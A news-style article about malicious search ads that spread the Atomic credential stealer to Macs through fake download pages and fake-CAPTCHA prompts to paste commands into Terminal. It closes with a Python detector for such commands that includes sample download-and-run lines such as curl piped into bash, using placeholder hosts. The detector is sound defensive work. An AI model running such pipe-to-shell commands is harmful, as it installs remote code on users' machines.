Here’s how potent Atomic credential stealer is finding its way onto Macs

Cyber Threats: Malicious Ads Impersonating Online Services Infect Macs with Potent Credential Stealer

A recent surge in malicious ads, designed to impersonate various online services, has been targeting Mac users with a potent credential stealer known as Atomic or Amos Stealer. The campaign, which has left multiple security companies warning of the threat, has seen ads prominently displayed on search engines such as Google and Bing, posing as authentic advertisements for well-known brands like LastPass, 1Password, Basecamp, Dropbox, and many others.

The malicious ads have been specifically crafted to target Mac users, with a focus on installing the Atomic credential stealer. This powerful tool is capable of stealing sensitive information from infected devices, including passwords, login credentials, and other confidential data. The campaign has been particularly successful in targeting LastPass users, with dozens reported to have fallen victim to the scam.

The ads, which are designed to mimic legitimate advertisements for popular software and services, often feature prominent fonts and attractive graphics. When clicked, however, they lead to GitHub pages that serve versions of Atomic disguised as the official software being falsely advertised. In some cases the page offers the stealer as a download in the macOS-native .dmg disk-image format.

Gatekeeper-Bypassing Technique Used by Attackers

In recent months, researchers have warned of a Gatekeeper-bypassing technique that attackers use to evade detection. The lure masquerades as a CAPTCHA check and asks the user to copy a text string and paste it into the Mac Terminal window. In reality, the string is a command that downloads and installs the malicious .dmg, so Gatekeeper never gets the chance to inspect it. Attackers have used this technique for at least 20 months, highlighting the ongoing threat posed by this credential stealer.

Impersonation of Multiple Online Services

The campaign’s success can be attributed to its ability to impersonate multiple online services, including:

  • LastPass
  • 1Password
  • Basecamp
  • Dropbox
  • Gemini
  • Hootsuite
  • Notion
  • Obsidian
  • Robinhood
  • Salesloft
  • SentinelOne
  • Shopify
  • Thunderbird
  • TweetDeck

These impersonations have been used to trick users into installing the Atomic credential stealer, which is often disguised as a legitimate software update or installation. The campaign’s effectiveness can be seen in its ability to target users of various software and services, including Homebrew, a tool indispensable for many developers of macOS-compatible apps.

Protecting Yourself from Malicious Ads

To avoid falling victim to this scam, users should exercise caution when interacting with online ads. Specifically:

  • Only download software from links provided on the vendor's official website.
  • If you see an ad and decide to install the promoted app, open a new tab and go to the official website directly rather than clicking the download link in the ad.

Indicators of Compromise (IoCs)

LastPass has shared indicators of compromise (IoCs) to help security teams detect this campaign. The indicators fall into three groups:

  • GitHub pages impersonating popular software and services.
  • Download links for malicious .dmg files.
  • CAPTCHA-style prompts that require users to copy and paste text strings into the Mac terminal window.
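The fake-CAPTCHA lure described above only works if the pasted string is executed, so one place a defender can catch it after the fact is the shell history or command-line telemetry of the affected Mac. The following detector is an added example written for this page; it is not LastPass's published IoC list and not the campaign's own command. It flags any command line that both fetches from a remote URL and feeds the result into a shell, mounts a .dmg, or runs installer tooling, while leaving ordinary downloads alone. The history lines, host names (`*.example.invalid`) and function names are constructed for the illustration.

```python
"""
Heuristic detector for pasted "download-and-run" terminal commands of the kind
the fake-CAPTCHA lure relies on.

Added illustration for this article: not the campaign's command and not an
official IoC list. All sample lines below are constructed, with placeholder hosts.
"""
import re
import shlex
from dataclasses import dataclass, field

# Tools that pull content from the network.
FETCH_TOOLS = {"curl", "wget"}
# Interpreters that would execute whatever was fetched.
SHELLS = {"sh", "bash", "zsh"}
# macOS tooling that mounts or installs a downloaded image/package.
INSTALL_TOOLS = {"hdiutil", "open", "installer"}

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
DMG_RE = re.compile(r"\.dmg\b", re.IGNORECASE)


@dataclass
class Finding:
    command: str
    reasons: list = field(default_factory=list)


def _stages(command):
    """Split one shell line into its pipeline/sequence stages, each tokenised.

    "||" is listed before "|" so the alternation matches the longer operator first.
    """
    stages = []
    for seg in re.split(r"\|\||&&|;|\|", command):
        try:
            toks = shlex.split(seg)
        except ValueError:          # unbalanced quotes: fall back to whitespace split
            toks = seg.split()
        if toks:
            stages.append(toks)
    return stages


def classify_command(command):
    """Return the reasons a command looks like a paste-to-terminal dropper.

    An empty list means the line looked benign. A remote fetch alone is not
    enough; it has to be combined with execution, a .dmg, or installer tooling.
    """
    reasons = []
    stages = _stages(command)
    # Program name of each stage, with any leading path stripped (/usr/bin/curl -> curl).
    programs = [stage[0].rsplit("/", 1)[-1] for stage in stages]

    fetches = any(p in FETCH_TOOLS for p in programs) and URL_RE.search(command) is not None
    if not fetches:
        return reasons
    if any(p in SHELLS for p in programs):
        reasons.append("remote content piped into a shell")
    if any(p in INSTALL_TOOLS for p in programs) or DMG_RE.search(command):
        reasons.append("downloads a .dmg / invokes installer tooling")
    if "base64" in programs:
        reasons.append("decodes base64 before execution")
    return reasons


def scan_history(lines):
    """Run classify_command over history lines and return only the flagged ones."""
    findings = []
    for line in lines:
        reasons = classify_command(line.strip())
        if reasons:
            findings.append(Finding(line.strip(), reasons))
    return findings


# Constructed sample history: four benign lines and two that match the lure pattern.
SAMPLE_HISTORY = [
    "brew install wget",
    "curl -sO https://releases.example.invalid/checksums.txt",
    "git pull --rebase",
    "curl -fsSL https://cdn.example.invalid/verify | bash",
    "curl -L -o /tmp/update.dmg https://dl.example.invalid/app.dmg && hdiutil attach /tmp/update.dmg",
    "echo aGVsbG8= | base64 -d",
]

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"FLAGGED: {f.command}\n   -> {'; '.join(f.reasons)}")
```

In practice you would feed the function `~/.zsh_history` or `~/.bash_history` from the endpoint, or the process command lines collected by your EDR, and treat any hit as a reason to pull the host for a closer look; a plain `curl` of a checksum file is deliberately not a hit, so the rule stays quiet on developer machines that download things all day.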

Conclusion

The recent surge in malicious ads, designed to impersonate online services and infect Macs with a potent credential stealer, serves as a reminder of the ongoing threat posed by cyber attacks. The campaign’s ability to target multiple software and services highlights the need for users to exercise caution when interacting with online ads and only download software from official websites. By sharing indicators of compromise (IoCs) and raising awareness about this threat, LastPass aims to protect its customers while pursuing takedown and disruption efforts.